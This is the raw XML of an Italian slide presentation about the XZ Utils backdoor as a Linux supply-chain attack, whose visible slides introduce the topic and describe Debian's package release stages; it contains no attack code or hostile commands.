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48" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId102"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId103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7" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="265" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="269" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="279" r:id="rId16"/>
    <p:sldId id="271" r:id="rId17"/>
    <p:sldId id="272" r:id="rId18"/>
    <p:sldId id="273" r:id="rId19"/>
    <p:sldId id="274" r:id="rId20"/>
    <p:sldId id="276" r:id="rId21"/>
    <p:sldId id="277" r:id="rId22"/>
    <p:sldId id="283" r:id="rId23"/>
    <p:sldId id="278" r:id="rId24"/>
    <p:sldId id="280" r:id="rId25"/>
    <p:sldId id="281" r:id="rId26"/>
    <p:sldId id="282" r:id="rId27"/>
    <p:sldId id="284" r:id="rId28"/>
    <p:sldId id="364" r:id="rId29"/>
    <p:sldId id="285" r:id="rId30"/>
    <p:sldId id="286" r:id="rId31"/>
    <p:sldId id="288" r:id="rId32"/>
    <p:sldId id="292" r:id="rId33"/>
    <p:sldId id="289" r:id="rId34"/>
    <p:sldId id="291" r:id="rId35"/>
    <p:sldId id="294" r:id="rId36"/>
    <p:sldId id="295" r:id="rId37"/>
    <p:sldId id="297" r:id="rId38"/>
    <p:sldId id="296" r:id="rId39"/>
    <p:sldId id="298" r:id="rId40"/>
    <p:sldId id="299" r:id="rId41"/>
    <p:sldId id="300" r:id="rId42"/>
    <p:sldId id="301" r:id="rId43"/>
    <p:sldId id="303" r:id="rId44"/>
    <p:sldId id="304" r:id="rId45"/>
    <p:sldId id="305" r:id="rId46"/>
    <p:sldId id="306" r:id="rId47"/>
    <p:sldId id="307" r:id="rId48"/>
    <p:sldId id="309" r:id="rId49"/>
    <p:sldId id="310" r:id="rId50"/>
    <p:sldId id="314" r:id="rId51"/>
    <p:sldId id="315" r:id="rId52"/>
    <p:sldId id="316" r:id="rId53"/>
    <p:sldId id="319" r:id="rId54"/>
    <p:sldId id="318" r:id="rId55"/>
    <p:sldId id="327" r:id="rId56"/>
    <p:sldId id="320" r:id="rId57"/>
    <p:sldId id="321" r:id="rId58"/>
    <p:sldId id="324" r:id="rId59"/>
    <p:sldId id="323" r:id="rId60"/>
    <p:sldId id="325" r:id="rId61"/>
    <p:sldId id="328" r:id="rId62"/>
    <p:sldId id="326" r:id="rId63"/>
    <p:sldId id="331" r:id="rId64"/>
    <p:sldId id="332" r:id="rId65"/>
    <p:sldId id="333" r:id="rId66"/>
    <p:sldId id="334" r:id="rId67"/>
    <p:sldId id="335" r:id="rId68"/>
    <p:sldId id="336" r:id="rId69"/>
    <p:sldId id="337" r:id="rId70"/>
    <p:sldId id="338" r:id="rId71"/>
    <p:sldId id="329" r:id="rId72"/>
    <p:sldId id="330" r:id="rId73"/>
    <p:sldId id="339" r:id="rId74"/>
    <p:sldId id="340" r:id="rId75"/>
    <p:sldId id="341" r:id="rId76"/>
    <p:sldId id="317" r:id="rId77"/>
    <p:sldId id="344" r:id="rId78"/>
    <p:sldId id="342" r:id="rId79"/>
    <p:sldId id="345" r:id="rId80"/>
    <p:sldId id="346" r:id="rId81"/>
    <p:sldId id="347" r:id="rId82"/>
    <p:sldId id="348" r:id="rId83"/>
    <p:sldId id="349" r:id="rId84"/>
    <p:sldId id="350" r:id="rId85"/>
    <p:sldId id="352" r:id="rId86"/>
    <p:sldId id="351" r:id="rId87"/>
    <p:sldId id="353" r:id="rId88"/>
    <p:sldId id="354" r:id="rId89"/>
    <p:sldId id="356" r:id="rId90"/>
    <p:sldId id="355" r:id="rId91"/>
    <p:sldId id="360" r:id="rId92"/>
    <p:sldId id="359" r:id="rId93"/>
    <p:sldId id="357" r:id="rId94"/>
    <p:sldId id="358" r:id="rId95"/>
    <p:sldId id="365" r:id="rId96"/>
    <p:sldId id="361" r:id="rId97"/>
    <p:sldId id="363" r:id="rId98"/>
    <p:sldId id="366" r:id="rId99"/>
    <p:sldId id="368" r:id="rId100"/>
    <p:sldId id="369" r:id="rId101"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr rtl="0"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AC92143-9DC8-4AFE-A7A2-7F1B0D38DA54}" v="10" dt="2024-06-08T04:07:45.28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tableStyles" Target="tableStyle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handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId108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C2DBAD29-1E10-4643-A6A5-373BB0BCEC1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2338AFC5-7E1F-4CC0-BEAA-8D2CB102A36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37A0E7-4614-4857-B637-5A4950B76003}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>07/06/2024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A298A602-2F16-4C08-8327-9660DE46DAC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C7111D1B-6254-49F7-8F5E-A511EAC9CC3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58CF00-6DC0-4791-8596-ECA56005A74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9426587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 noProof="0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CA4D91-B313-40C5-B2EB-A6D7D5B8A17F}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" noProof="0" smtClean="0"/>
              <a:t>07/06/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" noProof="0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 noProof="0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 noProof="0"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" noProof="0"/>
              <a:t>Secondo livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" noProof="0"/>
              <a:t>Terzo livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="it-IT" noProof="0"/>
              <a:t>Quarto livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="it-IT" noProof="0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20ACA1-9413-4232-AD57-0C0C34D55BA0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34051339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20ACA1-9413-4232-AD57-0C0C34D55BA0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200959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0F8CF-692C-4963-8B5E-D1C0928CF1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9612" y="1013984"/>
            <a:ext cx="7714388" cy="3260635"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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419655-1613-4CC0-BBE9-BD2CB2C3C7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29612" y="4848464"/>
            <a:ext cx="7714388" cy="1085849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267FFF-6BC4-4DF0-BC55-B2C3BFD8E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270120-CDFC-48DE-A6EA-6DEEDD0E436A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6/7/2024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389830-A1B7-484B-832C-F64A558BDF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A8F727-72C8-47A9-8E54-AD8459028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‹N›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EED5540-64E5-4258-ABA4-753F07B71B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="4571506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27649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8A5DE-E5C6-4DB9-AD28-8F1EAC6F5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63E08E-9B2D-4740-9AC6-D5E1CFB95F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429566" y="2229957"/>
            <a:ext cx="9238434" cy="3866043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4E3736-E8AA-4F58-9D3A-27050B287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F5BA7-0A17-4D30-9B66-E29324151C73}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6/7/2024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E95E84-15BC-478B-9DAB-15025867B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E9D98F-E0A8-4254-A957-7F17811D0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2799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7DE70F5-2276-4F91-9FC2-8DA4B528814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44000" y="1467699"/>
            <a:ext cx="1758461" cy="4628301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1856C5-C2FD-45E4-A631-AC06B5495B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182312" y="1467699"/>
            <a:ext cx="7839379" cy="4628301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E336EA-B6DD-4115-9C67-79A24C866E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EBB1B-D40A-4DB9-B3DE-BAAE675B83CD}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6/7/2024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EA668B-1DAB-449C-9BA4-7B1572A22B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C6567E-119D-4C98-93FF-73A332803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6013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EF94C-BCB1-4F4C-AF70-DD2A5C4E33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45445"/>
            <a:ext cx="9238434" cy="857559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909B75-A057-44B5-872F-DF01BDC8EA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9566" y="2286000"/>
            <a:ext cx="9238434" cy="3810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06260C-3219-4812-88F2-3162D37F29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9FAAF-C467-4C93-8ECD-39AF5A14D498}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6/7/2024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762B73-9C01-4BE3-A199-782BE6EBA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761492-EB56-4454-9D2A-8BB94AACB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52663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980A128-A52A-402C-865B-1BF08D7F045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900447-3778-4AB7-ACB3-7C2313FE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1745" y="1287554"/>
            <a:ext cx="8284963" cy="3113064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t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B910C9-BA3C-4D31-9C62-2C2408591F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21744" y="4619707"/>
            <a:ext cx="7722256" cy="1476293"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr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742E8A-6B69-406B-A3DF-0A1B76832E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37E480-B2BA-4553-A144-61E7F75833ED}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6/7/2024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D665CF-4461-4BB8-8F3A-ED1CB1084C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898B27-5EF3-49F4-B3CE-F3CF419AE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2951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3F3BA-5AD5-4F15-97B2-E4652D1D4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13411"/>
            <a:ext cx="9238434" cy="88959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A997B8-1FD3-40E6-A486-256EB41DB7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29566" y="2135565"/>
            <a:ext cx="4495800" cy="396043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83F4D8-AA9A-4AF7-86EA-E4D797B98C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135565"/>
            <a:ext cx="4495800" cy="396043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08823E-BC08-4810-9BFF-35D2EA2AE7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E682A-6B53-4B08-AE4D-4C5E659103CC}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6/7/2024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DD2BFB-BB2C-4C4A-A6E1-DD223C2BE0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D369B2-12F8-4583-8A7F-523C9A3EF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5810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C717F-84B9-44BA-8DD6-680394AB19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79150"/>
            <a:ext cx="9238434" cy="82391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1217D6-7448-4625-964F-5D82F65F11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29567" y="2013217"/>
            <a:ext cx="4495799" cy="704232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800" b="0" cap="all" spc="3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3A534C-0B54-4327-99C0-4F0019FD21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29567" y="3048000"/>
            <a:ext cx="4495800" cy="3048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89D4A63-0795-4B74-8C11-5FE7944118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2013215"/>
            <a:ext cx="4495800" cy="70423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800" b="0" cap="all" spc="3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3D16F3-F747-441B-9854-27225954DE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3048000"/>
            <a:ext cx="4495800" cy="3048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E8168E2-6B97-486E-B0E4-4E7F5CDBB5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9F0F6-BEBB-4894-ABB2-75C5CBE0DDB9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6/7/2024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05D3E2B-2F4E-4347-A8E9-27EB7D035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C1FC4F5-6876-414E-9E30-84706A3F5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‹N›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70D2F04-5474-46B9-B838-858CDF4AB2D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6270727" y="2876662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CADEE893-BE45-47F3-BCF0-02424B3503CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1171838" y="4592406"/>
            <a:ext cx="808262" cy="3897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FB5178A-4501-4B56-8BF1-D083D7B021CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2876662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69466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52109C6-041C-42BA-B507-8EA298046ED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7BF877-20DD-40F4-AEA8-E1B6D5350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67DC874-15B5-4338-B7D1-8E393AB4C1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E9E5F-17D9-4A30-9DA3-64E46A6DF111}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6/7/2024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66BAE3-24C5-483F-9141-D860A265E7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9AEEB4-66F8-4008-B616-804FB9D91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7729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46C975-8FFB-4A4B-9213-774EE3901D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AC5F0-3BC3-4718-BCCA-24B5655EC864}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6/7/2024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BA744F-475D-4105-8E4A-0258155495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3FA64C-7966-4D6F-88D7-4B89F2A1D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2101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4ED5F-AB94-4DCF-8971-B8B2B55AF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3740" y="1558944"/>
            <a:ext cx="3279689" cy="1864196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r"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1EE4CB-68CF-4BF3-A891-8277AFD13D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0" y="762000"/>
            <a:ext cx="5333999" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="180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292E72-B66D-40EE-B182-5585382A6D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43741" y="3649682"/>
            <a:ext cx="3233096" cy="1933605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73B694-B050-45F3-AE6F-A86A129F1C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B8BD81-465B-40F2-9A54-9DF3B12AF598}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6/7/2024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8AE423-9CA5-46B3-96B1-7586AD020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4B973D-F1F7-47BC-996D-6100B7C89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2687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E9949-4A1F-4DA9-9B75-A6180F954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3543" y="1383126"/>
            <a:ext cx="3289886" cy="2045874"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r"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9A8D794-C670-4569-93D9-0FF8B35AA7AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5334001" y="762000"/>
            <a:ext cx="5333999" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/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2486F6-AE67-4B34-B8E2-0B7576DC2E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33544" y="3649682"/>
            <a:ext cx="3243292" cy="1684317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98B11C-BB63-49A6-B488-29D4FBF8E1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B3CEF-64EF-4C43-9530-8E9CBFD2CAD1}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6/7/2024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4B9166-6D36-4F0A-9ADD-33D49A0C3A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B22B8F-7760-41B3-9053-DD90255B9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5577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F84152A-7FE0-4708-B7C1-DBEC8F133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41621"/>
            <a:ext cx="9238434" cy="86138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11AB53-BAF9-439D-9451-47193CF2FF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29566" y="2285999"/>
            <a:ext cx="9238434" cy="3810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B96D9F-562A-496F-A530-A561994DC5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471087" y="4891318"/>
            <a:ext cx="26732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 b="1" cap="all" spc="300" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{B70A3DFD-A535-46B2-84C1-61DC8B16A904}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6/7/2024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3060FE-AAC3-4FAE-9EB4-BCAE72D956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473021" y="1609893"/>
            <a:ext cx="26694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 b="1" cap="all" spc="3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77EDB2-8F31-42FA-B253-62D2414663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92908" y="3219853"/>
            <a:ext cx="629653" cy="4298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 b="1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fld id="{196A61CA-0502-4EE4-9724-96EA822543E5}" type="slidenum">
              <a:rPr lang="en-US" dirty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74788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9" r:id="rId1"/>
    <p:sldLayoutId id="2147483750" r:id="rId2"/>
    <p:sldLayoutId id="2147483751" r:id="rId3"/>
    <p:sldLayoutId id="2147483752" r:id="rId4"/>
    <p:sldLayoutId id="2147483753" r:id="rId5"/>
    <p:sldLayoutId id="2147483754" r:id="rId6"/>
    <p:sldLayoutId id="2147483755" r:id="rId7"/>
    <p:sldLayoutId id="2147483756" r:id="rId8"/>
    <p:sldLayoutId id="2147483757" r:id="rId9"/>
    <p:sldLayoutId id="2147483758" r:id="rId10"/>
    <p:sldLayoutId id="2147483759" r:id="rId11"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0"/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2800" b="1" kern="1200" cap="all" spc="6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914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:buSzPct val="8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274320" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buSzPct val="85000"/>
        <a:buFontTx/>
        <a:buNone/>
        <a:defRPr sz="16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-182880" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buSzPct val="8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466344" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buSzPct val="85000"/>
        <a:buFontTx/>
        <a:buNone/>
        <a:defRPr sz="12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640080" indent="-182880" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buSzPct val="85000"/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80">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="3840">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="7200">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="6720">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="16" pos="480">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="23" orient="horz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ystemd/systemd/issues/32028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mailto:security@debian.org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jpe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jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37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file:///\\n\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hyperlink" Target="file:///\\$V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5180965" y="360706"/>
            <a:ext cx="6640884" cy="3240079"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="3600">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3600" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>UtilS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3600">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> Backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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5176266" y="3607984"/>
            <a:ext cx="6639076" cy="2266602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it-IT"/>
              <a:t>Linux Supply Chain Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Giorgio Chirico</a:t>
            </a:r>
          </a:p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4C130A0F-F6EB-60D6-2AB8-B3C7DFD09691}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="842380" y="3601648"/>
            <a:ext cx="1950906" cy="119222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it-IT" sz="7200"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene disegno, schizzo, clipart, cappello&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C636502-D499-2821-1FF7-64394816D6C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80" r="560" b="12885"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="586509" y="498230"/>
            <a:ext cx="4091746" cy="3573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5936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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10512832" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> Introduzione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="92366" y="1984887"/>
            <a:ext cx="6761444" cy="41672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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux Software Release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LifeCycle</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="3200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Esempio, integrazione di una libreria di terze parti in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stadio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Experimental</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: progetto caricato su piattaforma;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stadio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unstable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(o "cutting-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> compila un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>initial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> package da inviare al server ftp dove gli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ftpmasters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> revisionano (soprattutto) il Source Code, collaborando col </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2000">
              <a:solidFill>
